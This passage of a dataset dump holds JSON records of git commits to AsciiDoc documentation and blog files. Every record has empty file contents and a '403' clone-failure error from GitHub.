glefloch\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,a2lin\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/query-dsl\/has-child-query.asciidoc","new_file":"docs\/reference\/query-dsl\/has-child-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb22dcfd3f95a36bae3425fd370a8e433cd7a3ad","subject":"olfs: GSOC 2019 1st draft","message":"olfs: GSOC 2019 1st draft\n","repos":"OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs,OPENDAP\/olfs","old_file":"resources\/gsoc\/ifh.adoc","new_file":"resources\/gsoc\/ifh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OPENDAP\/olfs.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"2d1bff216c53faa4b92d31e1a3ec0f1b76ec976b","subject":"Update 2014-07-17-Give-it-back-to-the-community.adoc","message":"Update 2014-07-17-Give-it-back-to-the-community.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-07-17-Give-it-back-to-the-community.adoc","new_file":"_posts\/2014-07-17-Give-it-back-to-the-community.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"444e2a62968f7718520d74fdab2e0d0aa0158344","subject":"add Ch2_HowToWrite\/promise-all.adoc","message":"add Ch2_HowToWrite\/promise-all.adoc\n","repos":"tangjinzhou\/promises-book,cqricky\/promises-book,liubin\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,cqricky\/promises-book,purepennons\/promises-book,genie88\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,purepennons\/promises-book,genie88\/promises-book,oToUC\/promises-book,mzbac\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,dieface\/promises-book,sunfurong\/promise,wenber\/promises-book,liubin\/promises-book,cqricky\/promises-book,liubin\/promises-book,mzbac\/promises-book,mzbac\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,wenber\/promises-book,sunfurong\/promise,purepennons\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,liyunsheng\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,wangwei1237\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book","old_file":"Ch2_HowToWrite\/promise-all.adoc","new_file":"Ch2_HowToWrite\/promise-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e7b7174025d9e1f392ef3cff038f55c7f5dccd8","subject":"y2b create post A Cool Desk Gadget Under $30","message":"y2b create post A Cool Desk Gadget Under $30","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-06-A-Cool-Desk-Gadget-Under-30.adoc","new_file":"_posts\/2016-06-06-A-Cool-Desk-Gadget-Under-30.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ead4f22bb055b6a6339ed93702145ed0adecc656","subject":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-7-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"192cffc3be0a8402ae396985683697bf61a5baf0","subject":"Update 2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","message":"Update 2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","new_file":"_posts\/2016-10-07-The-5-types-of-Millennials-In-The-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a01df938467a8ad78a597827f62ca56140f4b7","subject":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","message":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf8e07d8069ec777513fde0c21b8573adfd2a9fc","subject":"create post I've Never Tried Anything Like It...","message":"create post I've Never Tried Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Ive-Never-Tried-Anything-Like-It....adoc","new_file":"_posts\/2018-02-26-Ive-Never-Tried-Anything-Like-It....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a48e8ef59b825d5bb22c82045e3c640c389c3df1","subject":"Added best-practices section","message":"Added best-practices section\n\n`Handling multiple stages` and `Integrating external Services` is close\nto being finalized and will be made available tomorrow\n","repos":"wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"best-practices\/readme.adoc","new_file":"best-practices\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wombat\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f1271e9e446c7e2d5a7b5c908f4d920b0c89394","subject":"dmr demo on wildfly","message":"dmr demo on wildfly\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"cli\/dmr-demo\/README.adoc","new_file":"cli\/dmr-demo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f878089dec6c03090efbcc79b08edbfbffb7620","subject":"Update components-grid.asciidoc (#9813)","message":"Update components-grid.asciidoc (#9813)\n\nUpdates related to #9810 ","repos":"Darsstar\/framework,asashour\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/components\/components-grid.asciidoc","new_file":"documentation\/components\/components-grid.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"699ab092315f83ac42d63c2eaaecd0ce50cba42e","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4508c41c490f66254d3445d0868be1b1cae90420","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0ddd4a6229f88e85144ab202480667f3fa9ee85","subject":"Update 2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","message":"Update 2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","new_file":"_posts\/2018-02-13-Q-R-code-the-U-R-L-of-the-Web-site-currently-displayed-on-React-based-Chrome-extesion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bebcc5644f7be14e16fa73485f9c36b08a862674","subject":"Update 2016-12-18-About-Me.adoc","message":"Update 2016-12-18-About-Me.adoc","repos":"chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io,chowwin\/chowwin.github.io","old_file":"_posts\/2016-12-18-About-Me.adoc","new_file":"_posts\/2016-12-18-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chowwin\/chowwin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5129d558f9810ce6b1a68b49c11b921d73724df6","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_obsession_with_numbers.adoc","new_file":"content\/writings\/on_obsession_with_numbers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9ee141a2e417b05184c14796a599a3c79945762d","subject":"Release Candidate post","message":"Release Candidate post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-07-28-release-candidate.adoc","new_file":"content\/news\/2017-07-28-release-candidate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e2f78e67eb533dfc783c30b29d691a3841178cc9","subject":"y2b create post iPhone Camera Transformer!","message":"y2b create post iPhone Camera Transformer!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-03-iPhone-Camera-Transformer.adoc","new_file":"_posts\/2016-03-03-iPhone-Camera-Transformer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd2099844d7c5fba70591853202dc9bd655aa5b8","subject":"Update 2016-12-30-Episode-82-Last-Gasp-2016.adoc","message":"Update 2016-12-30-Episode-82-Last-Gasp-2016.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-12-30-Episode-82-Last-Gasp-2016.adoc","new_file":"_posts\/2016-12-30-Episode-82-Last-Gasp-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10256b0ce7d4584bc506370a088d94e63853c59f","subject":"Renamed '_posts\/2017-10-20-My-first-post.adoc' to '_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc'","message":"Renamed '_posts\/2017-10-20-My-first-post.adoc' to '_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc'","repos":"severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io,severin31\/severin31.github.io","old_file":"_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc","new_file":"_posts\/2017-10-20-Easy-start-with-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/severin31\/severin31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4215205831611f258a18d96ddab92dd049d97164","subject":"add math module","message":"add math module\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"math.adoc","new_file":"math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"92747e1f4a66ceff561cace34b2e462a4eaf5afd","subject":"DBZ-1806 Community newsletter 1\/2020","message":"DBZ-1806 Community newsletter 1\/2020\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-31-debezium-newsletter-01-2020.adoc","new_file":"blog\/2020-03-31-debezium-newsletter-01-2020.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ca7aab4cf6f64e88c692d9c4ecb81e85add92ba","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b92b05e3080f5d488ac074501fa40e8fd153863","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e11ff9b7475678ef1515c76862f6e272201016f","subject":"Update 2014-09-01-Recursive-lambdas-in-Java-8.adoc","message":"Update 2014-09-01-Recursive-lambdas-in-Java-8.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2014-09-01-Recursive-lambdas-in-Java-8.adoc","new_file":"_posts\/2014-09-01-Recursive-lambdas-in-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccc8eab5115de48feee6e6198ea490b1a0286c3e","subject":"Description of public features.","message":"Description of public features.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/public-features.adoc","new_file":"docs\/public-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4486d007ff1be2d472a6f7a6e6f4b2a519ba370f","subject":"Update 2017-07-11-the-students-outpost-about2.adoc","message":"Update 2017-07-11-the-students-outpost-about2.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8f79105b93ec06c0ce6977ba59aed98dcba1911","subject":"profiling update","message":"profiling update\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-15-19-profiling.asciidoc","new_file":"content\/available\/2015-04-15-19-profiling.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b83bf7f854904a3958e2d6cef727c2cafb0357a8","subject":"deprecate etc\/source.me","message":"deprecate etc\/source.me\n\nSigned-off-by: Gregg Reynolds <d0f77bc71a9867acdcb4f62f012b858edad79160@norc.org>\n","repos":"iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java","old_file":"etc\/source.me\/README.adoc","new_file":"etc\/source.me\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iotk\/iochibity-java.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c72e592febc9b04d7de931dd78a5ea7eb0b1077f","subject":"Update 2016-02-06-Learning-resources-101.adoc","message":"Update 2016-02-06-Learning-resources-101.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2016-02-06-Learning-resources-101.adoc","new_file":"_posts\/2016-02-06-Learning-resources-101.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d22684d72ce622e18229a1b9c38c9dea4125825e","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07b72ad6924cfcd4cf83f151e8166cb327649584","subject":"Update 2016-11-05-About-The-Dullest-Saga.adoc","message":"Update 2016-11-05-About-The-Dullest-Saga.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b0eaa4d0967c590578844808b169b15cb759bd2","subject":"Update 2017-05-01-Git-Flow-Groundhog-Day.adoc","message":"Update 2017-05-01-Git-Flow-Groundhog-Day.adoc","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-05-01-Git-Flow-Groundhog-Day.adoc","new_file":"_posts\/2017-05-01-Git-Flow-Groundhog-Day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/daemotron\/daemotron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bce14f337666d5a75331474cab5165c0933ce38a","subject":"add GEP for records","message":"add GEP for records\n","repos":"keeganwitt\/groovy-website,keeganwitt\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-14.adoc","new_file":"site\/src\/site\/wiki\/GEP-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/keeganwitt\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6013ab5ed6cfc10f353b623de521272787fd6a27","subject":"Sol link","message":"Sol link\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ae207f589e02983f5d014b3bfb80dc59b8eafae","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14303d6025221ae4c10469da426a33d3031e0830","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ab6861ecd495fb2329663eee61f7dfd0423f2e","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"429e1d66b750db888a31849331cd4882ca401d08","subject":"Update 2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","message":"Update 2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8256eb46b8aa74c834a624781d43fa0f66dacb05","subject":"Update 2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","message":"Update 2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","new_file":"_posts\/2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ef5effe57a49c46143949980d635e685897989d","subject":"Fix a sentence in `core-testing-guide.adoc`","message":"Fix a sentence in `core-testing-guide.adoc`\n","repos":"EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy","old_file":"src\/spec\/doc\/core-testing-guide.adoc","new_file":"src\/spec\/doc\/core-testing-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EPadronU\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e4a4bd6c5b19455ce97366955ac084e92e0de34","subject":"Create Endpoint-dsl.adoc (#3642)","message":"Create Endpoint-dsl.adoc (#3642)\n\n","repos":"pmoerenhout\/camel,ullgren\/camel,gnodet\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,pmoerenhout\/camel,pax95\/camel,mcollovati\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,mcollovati\/camel,DariusX\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,zregvart\/camel,apache\/camel,gnodet\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,christophd\/camel,apache\/camel,nicolaferraro\/camel,pmoerenhout\/camel,cunningt\/camel,cunningt\/camel,pmoerenhout\/camel,ullgren\/camel,tdiesler\/camel,nikhilvibhav\/camel,adessaigne\/camel,DariusX\/camel,nicolaferraro\/camel,mcollovati\/camel,adessaigne\/camel,cunningt\/camel,ullgren\/camel,ullgren\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/